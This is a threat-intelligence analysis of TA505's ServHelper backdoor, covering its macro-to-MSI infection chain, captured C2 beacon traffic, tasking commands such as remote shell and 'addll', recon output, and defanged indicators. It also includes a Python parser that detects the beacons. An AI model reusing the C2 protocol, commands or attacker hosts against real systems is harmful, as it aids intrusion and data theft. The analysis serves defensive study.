MD5 — b0ecd639d4f4b3f1080c26abfa978681
While investigating the final payload (ServHelper), I found TA505's unregistered/unused domains, apparently reserved for future use. The domains are still available to register, so we may expect a next wave using them.
TA505’s unregistered/unused domains:
dsfk3322442fr44446g[.]icu — used as C2 but not registered
gdskjkkkss[.]pw — unused
Analysis:
Stage 1: The macro executes and downloads an MSI installer file which contains the ServHelper backdoor.
Downloader: hxxp://169.239.129[.]61/k1 → rdy.exe
MD5: 2737455bff260fdc22216c3d1185d814
SHA256: FCFAA5A008448BE96B273CA3D59E28D4A0B20156909DA676520DC5103D15AD77
During execution, the Excel 4.0 macro runs the macro script; the downloader URL is embedded in \_VBA_PROJECT_CUR\Form17\f.
Request:
GET /k1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 169.239.129[.]61
Connection: keep-alive
Stage 2: rdy.exe extracts the ServHelper backdoor, a DLL file named “dxdiag.dll”.
dxdiag.dll: ServHelper backdoor
MD5: 9c6ac05f579778bf0ea33452e12d1e42
SHA256: AD377333D9D2D6620FCB6B63B4C48BF70202776E1E9BB38A8577434937C08E73
The first-stage downloader ‘rdy.exe’ is an MSI installer package which installs the ServHelper backdoor “dxdiag.dll”.
The files are digitally signed.
Stage 3: Once the backdoor is installed, it collects machine workgroup information and sends a POST request to the C2.
C2: hxxp://medastr[.]com/docs/s.php
POST /docs/s.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Content-Length: 137
Host: medastr[.]com
Connection: keep-alive
key=document&sysid=jun23Windows+7+Service+Pack+1+%28Version+6.1%2C+Build+7601%2C+64-bit+Edition%29_Jones%3A50496&resp=knock&misc=&rights=
The C2 responds with an instruction to execute “net group /domain” in cmd.exe.
Response:
shell^net group /domain
The machine then sends a POST request carrying the results of the command.
2nd request body from a workgroup (non-domain) machine:
key=document&sysid=jun23Windows+7+Service+Pack+1+%28Version+6.1%2C+Build+7601%2C+64-bit+Edition%29_USER%3A50496&resp=The+request+will+be+processed+at+a+domain+controller+for+domain+WORKGROUP.%0D%0A%0D%0ASystem+error+1355+has+occurred.%0D%0A%0D%0AThe+specified+domain+either+does+not+exist+or+could+not+be+contacted.%0D%0A%0D%0A&misc=&rights=
2nd request body from a domain-joined machine:
POST hxxp://medastr[.]com/docs/s.php HTTP/1.1
Proxy-Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Content-Length: 1242
Host: medastr[.]com
key=document&sysid=jun23Windows+10+%28Version+10.0%2C+Build+17763%2C+64-bit+Edition%29_client2%3A92113&resp=The+request+will+be+processed+at+a+domain+controller+for+domain+[Redacted domain information]
Depending on the attacker's interest in the victim, additional commands are then issued.
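The check-in and tasking exchange described above lends itself to a simple traffic parser. The following is an added example (not code from the original post or from the malware): it decodes the form-encoded beacon body, splits the sysid field into its campaign tag, OS string and hostname as laid out in the captures above, classifies the resp field, and splits the C2's `verb^args` reply. The sample bodies are constructed from the quoted captures; the `jun23` tag layout and the domain name `EXAMPLE` are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample traffic modelled on the request bodies and the C2 reply
# quoted in the analysis above (not captured from a live sample).
SAMPLE_POST_BODIES = [
    "key=document&sysid=jun23Windows+7+Service+Pack+1+%28Version+6.1%2C+Build+7601"
    "%2C+64-bit+Edition%29_Jones%3A50496&resp=knock&misc=&rights=",
    "key=document&sysid=jun23Windows+10+%28Version+10.0%2C+Build+17763%2C+64-bit+Edition"
    "%29_client2%3A92113&resp=The+request+will+be+processed+at+a+domain+controller"
    "+for+domain+EXAMPLE.%0D%0A&misc=&rights=",
    "user=alice&action=login",  # benign form post; must not be flagged
]
SAMPLE_C2_REPLY = "shell^net group /domain"

# sysid layout seen in the captures: <campaign tag><OS string>_<host>:<number>
# (the three-letter-plus-two-digit tag format is an assumption drawn from "jun23")
SYSID_RE = re.compile(r"^(?P<tag>[a-z]{3}\d{2})(?P<os>.+?)_(?P<host>[^:]+):(?P<num>\d+)$")

def parse_beacon(body):
    """Return the decoded fields if body has the ServHelper check-in shape, else None."""
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("key") != ["document"] or "sysid" not in fields or "resp" not in fields:
        return None
    m = SYSID_RE.match(fields["sysid"][0])
    if not m:
        return None
    return {"tag": m["tag"], "os": m["os"], "host": m["host"], "resp": fields["resp"][0]}

def classify_resp(resp):
    """Map the resp field to what the bot is reporting back to the C2."""
    if resp == "knock":
        return "checkin"                      # initial beacon, no command output yet
    if "System error 1355" in resp:
        return "net_group_failed_workgroup"   # 'net group /domain' on a standalone host
    if "domain controller for domain" in resp:
        return "net_group_output_domain"      # domain-joined host, enumeration succeeded
    return "other"

def parse_c2_command(reply):
    """Split a 'verb^args' tasking reply into (verb, args); None if not that shape."""
    verb, sep, args = reply.partition("^")
    if not sep or not verb.isalnum():
        return None
    return verb, args

def scan(bodies):
    """Return one finding per body that parses as a ServHelper beacon."""
    findings = []
    for b in bodies:
        parsed = parse_beacon(b)
        if parsed:
            findings.append((parsed["host"], classify_resp(parsed["resp"])))
    return findings
```

Running `scan(SAMPLE_POST_BODIES)` on the constructed samples yields one check-in from `Jones` and one domain enumeration result from `client2`, and ignores the benign form post.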
Backdoor Analysis:
The backdoor is packed with PECompact; the unpacked file is a Delphi-compiled payload.
The backdoor is a ServHelper variant which connects to the C2 medastr[.]com.
Once the backdoor runs, it performs a sequence of steps to gather information from the machine and POSTs it back to the C2.
Some of the observations:
1. Reconnaissance: PowerShell script.
During the investigation I found that the final payload executes a PowerShell script to gather machine and user information: it performs reconnaissance on the infected machine, checks whether the user is an admin, and if so sends the details to the C2.
2. Persistence: Run key
3. Commands from C2: commands recovered from the payload, which the adversary can issue for execution.
enum
shell — Executes commands in cmd
persist
slp_ok — sleep
addll — installs additional malware
selfkill — self destruction
/c ping localhost -n 10 > nul & del
4. C2: unregistered/unused C2s
During reverse engineering of the final payload (ServHelper), I found TA505's unregistered/unused domains, apparently reserved for future use. The domains are still available to register, so we may expect a next wave using them.
5. Decentralized domain names:
The adversary uses decentralized domain names as C2; for these you cannot find WHOIS information in the ICANN list, and they are not approved by ICANN.
These domains are sold through blockchain technology: the adversary buys them with bitcoin, covering their traces, so the domains are hard for the authorities to trace.
As we can see, the 2 new domains are planned for registration under the “icu” and “pw” TLDs, and these are still available to buy.
Communication to unregistered C2:
Command analysis:
I replayed the command on the infected machine to check the behaviour and found that it executes but.ps1 to enumerate the machine and responds accordingly. They are mainly looking for domain machines, which clearly shows their attack platform and target: financial organisations.
Output of but.ps1:
USER-PC is not part of a domain.
is part of admin group
admin(high integrity): False
WARNING: column "CurrentLocation" does not fit into the display and was removed.

Name  Used (GB)  Free (GB)  Provider    Root
----  ---------  ---------  --------    ----
C         38.10      51.80  FileSystem  C:\
D                           FileSystem  D:\